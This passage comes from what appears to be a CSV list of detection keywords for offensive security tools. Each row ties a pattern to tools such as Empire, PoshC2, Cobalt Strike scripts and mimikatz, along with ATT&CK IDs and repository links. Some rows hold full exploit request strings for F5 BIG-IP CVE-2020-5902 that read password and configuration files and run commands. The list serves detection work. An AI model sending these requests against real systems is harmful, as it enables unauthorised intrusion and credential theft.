- CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*generate_raw_payload*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*generate_spoofed_args_exe*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*generate_stageless*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*generate_unmanaged_exe operation1 *.exe","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*generate_x64_shellcode*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*generate_x86_shellcode*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*GenerateDllBase64Hta*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*GenerateExeBase64*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*GenerateForcedBrowseWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*generateInjectBinFile*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Generate-Macro.ps1*","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","7","665","218","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z" +"*GenerateParameterWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*GenerateReverseTcpDrone*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*generate-rotating-beacon.*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" +"*GeneratesShellcodeFromPEorDll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*GenericC2Relay.cs*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*Genetic-Malware/Ebowla*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*genHTA*","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/genHTA","1","0","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z" +"*genmkvpwd *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*gentilkiwi*","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*GeorgePatsias/ScareCrow*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"*georgesotiriadis/Chimera*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET *https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=whoami*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*get_beacon(*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*get_BeaconHealthCheck_settings*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" +"*get_c2_messages*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_c2server_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_cmd_from_task_id*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_dns_dnsidle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Get_DPAPI_Protected_Files*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*get_filezilla_creds.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*get_hijackeable_dllname*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*get_implants_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_injection_techniques*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*get_keystrokes.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*get_list_of_implant_text*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*get_masterkeys_from_lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*get_newimplanturl*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_obfucation_string_dict*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*get_password_policy.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 